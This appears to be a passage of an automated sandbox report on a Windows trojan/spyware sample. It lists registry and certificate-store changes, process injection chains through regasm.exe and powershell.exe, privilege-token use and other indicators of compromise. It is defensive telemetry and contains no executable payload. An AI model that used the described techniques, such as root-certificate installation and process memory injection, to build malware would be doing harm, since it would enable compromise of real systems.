Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2162 = "Altai Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-572 = "China Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	SPYXfri.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time"	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-361 = "GTB Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	GjI6ioR6cLVRryk8D6Bj6r6Y.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

Processes:

3BVFDXkt09D3q0LgQVE6DprB.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4	3BVFDXkt09D3q0LgQVE6DprB.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	3BVFDXkt09D3q0LgQVE6DprB.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	3BVFDXkt09D3q0LgQVE6DprB.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exepowershell.exepowershell.exeGjI6ioR6cLVRryk8D6Bj6r6Y.exez3XO3y8eiP2BsC1smWlI5r5w.exepowershell.exepowershell.exepowershell.exeGjI6ioR6cLVRryk8D6Bj6r6Y.exez3XO3y8eiP2BsC1smWlI5r5w.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeinjector.exe

pid	process
4960	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe
3320	powershell.exe
1472	powershell.exe
3320	powershell.exe
1472	powershell.exe
3800	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
3044	z3XO3y8eiP2BsC1smWlI5r5w.exe
3800	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
3044	z3XO3y8eiP2BsC1smWlI5r5w.exe
4084	powershell.exe
4084	powershell.exe
4084	powershell.exe
1228	powershell.exe
1228	powershell.exe
1228	powershell.exe
1288	powershell.exe
1288	powershell.exe
1288	powershell.exe
1300	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
1300	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
1300	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
1300	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
1300	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
1300	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
1300	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
1300	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
1300	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
1300	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
2884	z3XO3y8eiP2BsC1smWlI5r5w.exe
2884	z3XO3y8eiP2BsC1smWlI5r5w.exe
2884	z3XO3y8eiP2BsC1smWlI5r5w.exe
2884	z3XO3y8eiP2BsC1smWlI5r5w.exe
2884	z3XO3y8eiP2BsC1smWlI5r5w.exe
2884	z3XO3y8eiP2BsC1smWlI5r5w.exe
2884	z3XO3y8eiP2BsC1smWlI5r5w.exe
2884	z3XO3y8eiP2BsC1smWlI5r5w.exe
2884	z3XO3y8eiP2BsC1smWlI5r5w.exe
2884	z3XO3y8eiP2BsC1smWlI5r5w.exe
4020	powershell.exe
4020	powershell.exe
4608	powershell.exe
4608	powershell.exe
4020	powershell.exe
4608	powershell.exe
2800	powershell.exe
2800	powershell.exe
2800	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
3320	powershell.exe
3320	powershell.exe
3320	powershell.exe
5020	powershell.exe
5020	powershell.exe
5020	powershell.exe
4684	powershell.exe
4684	powershell.exe
4684	powershell.exe
3468	injector.exe
3468	injector.exe
3468	injector.exe
3468	injector.exe
3468	injector.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exeregasm.exepowershell.exepowershell.exez3XO3y8eiP2BsC1smWlI5r5w.exeGjI6ioR6cLVRryk8D6Bj6r6Y.exepowershell.exepowershell.exepowershell.exeWMIC.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execsrss.exesc.exeSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

description	pid	process
Token: SeDebugPrivilege	4960	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe
Token: SeDebugPrivilege	4284	regasm.exe
Token: SeDebugPrivilege	1472	powershell.exe
Token: SeDebugPrivilege	3320	powershell.exe
Token: SeDebugPrivilege	3044	z3XO3y8eiP2BsC1smWlI5r5w.exe
Token: SeDebugPrivilege	3800	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
Token: SeImpersonatePrivilege	3800	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
Token: SeImpersonatePrivilege	3044	z3XO3y8eiP2BsC1smWlI5r5w.exe
Token: SeDebugPrivilege	4084	powershell.exe
Token: SeDebugPrivilege	1228	powershell.exe
Token: SeDebugPrivilege	1288	powershell.exe
Token: SeIncreaseQuotaPrivilege	4424	WMIC.exe
Token: SeSecurityPrivilege	4424	WMIC.exe
Token: SeTakeOwnershipPrivilege	4424	WMIC.exe
Token: SeLoadDriverPrivilege	4424	WMIC.exe
Token: SeSystemProfilePrivilege	4424	WMIC.exe
Token: SeSystemtimePrivilege	4424	WMIC.exe
Token: SeProfSingleProcessPrivilege	4424	WMIC.exe
Token: SeIncBasePriorityPrivilege	4424	WMIC.exe
Token: SeCreatePagefilePrivilege	4424	WMIC.exe
Token: SeBackupPrivilege	4424	WMIC.exe
Token: SeRestorePrivilege	4424	WMIC.exe
Token: SeShutdownPrivilege	4424	WMIC.exe
Token: SeDebugPrivilege	4424	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4424	WMIC.exe
Token: SeRemoteShutdownPrivilege	4424	WMIC.exe
Token: SeUndockPrivilege	4424	WMIC.exe
Token: SeManageVolumePrivilege	4424	WMIC.exe
Token: 33	4424	WMIC.exe
Token: 34	4424	WMIC.exe
Token: 35	4424	WMIC.exe
Token: 36	4424	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4424	WMIC.exe
Token: SeSecurityPrivilege	4424	WMIC.exe
Token: SeTakeOwnershipPrivilege	4424	WMIC.exe
Token: SeLoadDriverPrivilege	4424	WMIC.exe
Token: SeSystemProfilePrivilege	4424	WMIC.exe
Token: SeSystemtimePrivilege	4424	WMIC.exe
Token: SeProfSingleProcessPrivilege	4424	WMIC.exe
Token: SeIncBasePriorityPrivilege	4424	WMIC.exe
Token: SeCreatePagefilePrivilege	4424	WMIC.exe
Token: SeBackupPrivilege	4424	WMIC.exe
Token: SeRestorePrivilege	4424	WMIC.exe
Token: SeShutdownPrivilege	4424	WMIC.exe
Token: SeDebugPrivilege	4424	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4424	WMIC.exe
Token: SeRemoteShutdownPrivilege	4424	WMIC.exe
Token: SeUndockPrivilege	4424	WMIC.exe
Token: SeManageVolumePrivilege	4424	WMIC.exe
Token: 33	4424	WMIC.exe
Token: 34	4424	WMIC.exe
Token: 35	4424	WMIC.exe
Token: 36	4424	WMIC.exe
Token: SeDebugPrivilege	4020	powershell.exe
Token: SeDebugPrivilege	4608	powershell.exe
Token: SeDebugPrivilege	2800	powershell.exe
Token: SeDebugPrivilege	4656	powershell.exe
Token: SeDebugPrivilege	3320	powershell.exe
Token: SeDebugPrivilege	5020	powershell.exe
Token: SeDebugPrivilege	4684	powershell.exe
Token: SeSystemEnvironmentPrivilege	2172	csrss.exe
Token: SeSecurityPrivilege	244	sc.exe
Token: SeSecurityPrivilege	244	sc.exe
Token: SeDebugPrivilege	1900	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

Suspicious use of FindShellTrayWindow 7 IoCs

Processes:

u2dg.3.exe

pid process

1424 u2dg.3.exe
1424 u2dg.3.exe
1424 u2dg.3.exe
1424 u2dg.3.exe
1424 u2dg.3.exe
1424 u2dg.3.exe
1424 u2dg.3.exe
Suspicious use of SendNotifyMessage 7 IoCs

Processes:

u2dg.3.exe

pid process

1424 u2dg.3.exe
1424 u2dg.3.exe
1424 u2dg.3.exe
1424 u2dg.3.exe
1424 u2dg.3.exe
1424 u2dg.3.exe
1424 u2dg.3.exe

pid	process
1424	u2dg.3.exe
1424	u2dg.3.exe
1424	u2dg.3.exe
1424	u2dg.3.exe
1424	u2dg.3.exe
1424	u2dg.3.exe
1424	u2dg.3.exe

pid	process
1424	u2dg.3.exe
1424	u2dg.3.exe
1424	u2dg.3.exe
1424	u2dg.3.exe
1424	u2dg.3.exe
1424	u2dg.3.exe
1424	u2dg.3.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exeregasm.exeB8Ng9DuIJgnvrbMHtNWim1HP.exez3XO3y8eiP2BsC1smWlI5r5w.exeGjI6ioR6cLVRryk8D6Bj6r6Y.exeGjI6ioR6cLVRryk8D6Bj6r6Y.exez3XO3y8eiP2BsC1smWlI5r5w.exe3BVFDXkt09D3q0LgQVE6DprB.exeOYYF9HTQ5SJVtUftEvg2Vczg.exe3BVFDXkt09D3q0LgQVE6DprB.exeInstall.exeforfiles.exe

description	pid	process	target process
PID 4960 wrote to memory of 4284	4960	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe	regasm.exe
PID 4960 wrote to memory of 4284	4960	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe	regasm.exe
PID 4960 wrote to memory of 4284	4960	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe	regasm.exe
PID 4960 wrote to memory of 4284	4960	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe	regasm.exe
PID 4960 wrote to memory of 4284	4960	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe	regasm.exe
PID 4960 wrote to memory of 4284	4960	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe	regasm.exe
PID 4960 wrote to memory of 4284	4960	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe	regasm.exe
PID 4960 wrote to memory of 4284	4960	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe	regasm.exe
PID 4960 wrote to memory of 3112	4960	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe	regasm.exe
PID 4960 wrote to memory of 3112	4960	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe	regasm.exe
PID 4960 wrote to memory of 3112	4960	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe	regasm.exe
PID 4284 wrote to memory of 3076	4284	regasm.exe	B8Ng9DuIJgnvrbMHtNWim1HP.exe
PID 4284 wrote to memory of 3076	4284	regasm.exe	B8Ng9DuIJgnvrbMHtNWim1HP.exe
PID 4284 wrote to memory of 3076	4284	regasm.exe	B8Ng9DuIJgnvrbMHtNWim1HP.exe
PID 3076 wrote to memory of 3400	3076	B8Ng9DuIJgnvrbMHtNWim1HP.exe	u2dg.0.exe
PID 3076 wrote to memory of 3400	3076	B8Ng9DuIJgnvrbMHtNWim1HP.exe	u2dg.0.exe
PID 3076 wrote to memory of 3400	3076	B8Ng9DuIJgnvrbMHtNWim1HP.exe	u2dg.0.exe
PID 4284 wrote to memory of 3044	4284	regasm.exe	z3XO3y8eiP2BsC1smWlI5r5w.exe
PID 4284 wrote to memory of 3044	4284	regasm.exe	z3XO3y8eiP2BsC1smWlI5r5w.exe
PID 4284 wrote to memory of 3044	4284	regasm.exe	z3XO3y8eiP2BsC1smWlI5r5w.exe
PID 4284 wrote to memory of 3800	4284	regasm.exe	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
PID 4284 wrote to memory of 3800	4284	regasm.exe	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
PID 4284 wrote to memory of 3800	4284	regasm.exe	GjI6ioR6cLVRryk8D6Bj6r6Y.exe
PID 3044 wrote to memory of 3320	3044	z3XO3y8eiP2BsC1smWlI5r5w.exe	powershell.exe
PID 3044 wrote to memory of 3320	3044	z3XO3y8eiP2BsC1smWlI5r5w.exe	powershell.exe
PID 3044 wrote to memory of 3320	3044	z3XO3y8eiP2BsC1smWlI5r5w.exe	powershell.exe
PID 3800 wrote to memory of 1472	3800	GjI6ioR6cLVRryk8D6Bj6r6Y.exe	powershell.exe
PID 3800 wrote to memory of 1472	3800	GjI6ioR6cLVRryk8D6Bj6r6Y.exe	powershell.exe
PID 3800 wrote to memory of 1472	3800	GjI6ioR6cLVRryk8D6Bj6r6Y.exe	powershell.exe
PID 4284 wrote to memory of 4544	4284	regasm.exe	XrPxlDIYiTy2ckRQ7B7AEfDZ.exe
PID 4284 wrote to memory of 4544	4284	regasm.exe	XrPxlDIYiTy2ckRQ7B7AEfDZ.exe
PID 1300 wrote to memory of 4084	1300	GjI6ioR6cLVRryk8D6Bj6r6Y.exe	powershell.exe
PID 1300 wrote to memory of 4084	1300	GjI6ioR6cLVRryk8D6Bj6r6Y.exe	powershell.exe
PID 1300 wrote to memory of 4084	1300	GjI6ioR6cLVRryk8D6Bj6r6Y.exe	powershell.exe
PID 2884 wrote to memory of 1228	2884	z3XO3y8eiP2BsC1smWlI5r5w.exe	powershell.exe
PID 2884 wrote to memory of 1228	2884	z3XO3y8eiP2BsC1smWlI5r5w.exe	powershell.exe
PID 2884 wrote to memory of 1228	2884	z3XO3y8eiP2BsC1smWlI5r5w.exe	powershell.exe
PID 4284 wrote to memory of 3888	4284	regasm.exe	OYYF9HTQ5SJVtUftEvg2Vczg.exe
PID 4284 wrote to memory of 3888	4284	regasm.exe	OYYF9HTQ5SJVtUftEvg2Vczg.exe
PID 4284 wrote to memory of 3888	4284	regasm.exe	OYYF9HTQ5SJVtUftEvg2Vczg.exe
PID 4284 wrote to memory of 724	4284	regasm.exe	3BVFDXkt09D3q0LgQVE6DprB.exe
PID 4284 wrote to memory of 724	4284	regasm.exe	3BVFDXkt09D3q0LgQVE6DprB.exe
PID 4284 wrote to memory of 724	4284	regasm.exe	3BVFDXkt09D3q0LgQVE6DprB.exe
PID 724 wrote to memory of 2584	724	3BVFDXkt09D3q0LgQVE6DprB.exe	3BVFDXkt09D3q0LgQVE6DprB.exe
PID 724 wrote to memory of 2584	724	3BVFDXkt09D3q0LgQVE6DprB.exe	3BVFDXkt09D3q0LgQVE6DprB.exe
PID 724 wrote to memory of 2584	724	3BVFDXkt09D3q0LgQVE6DprB.exe	3BVFDXkt09D3q0LgQVE6DprB.exe
PID 724 wrote to memory of 1100	724	3BVFDXkt09D3q0LgQVE6DprB.exe	3BVFDXkt09D3q0LgQVE6DprB.exe
PID 724 wrote to memory of 1100	724	3BVFDXkt09D3q0LgQVE6DprB.exe	3BVFDXkt09D3q0LgQVE6DprB.exe
PID 724 wrote to memory of 1100	724	3BVFDXkt09D3q0LgQVE6DprB.exe	3BVFDXkt09D3q0LgQVE6DprB.exe
PID 724 wrote to memory of 1016	724	3BVFDXkt09D3q0LgQVE6DprB.exe	3BVFDXkt09D3q0LgQVE6DprB.exe
PID 724 wrote to memory of 1016	724	3BVFDXkt09D3q0LgQVE6DprB.exe	3BVFDXkt09D3q0LgQVE6DprB.exe
PID 724 wrote to memory of 1016	724	3BVFDXkt09D3q0LgQVE6DprB.exe	3BVFDXkt09D3q0LgQVE6DprB.exe
PID 3888 wrote to memory of 2088	3888	OYYF9HTQ5SJVtUftEvg2Vczg.exe	Install.exe
PID 3888 wrote to memory of 2088	3888	OYYF9HTQ5SJVtUftEvg2Vczg.exe	Install.exe
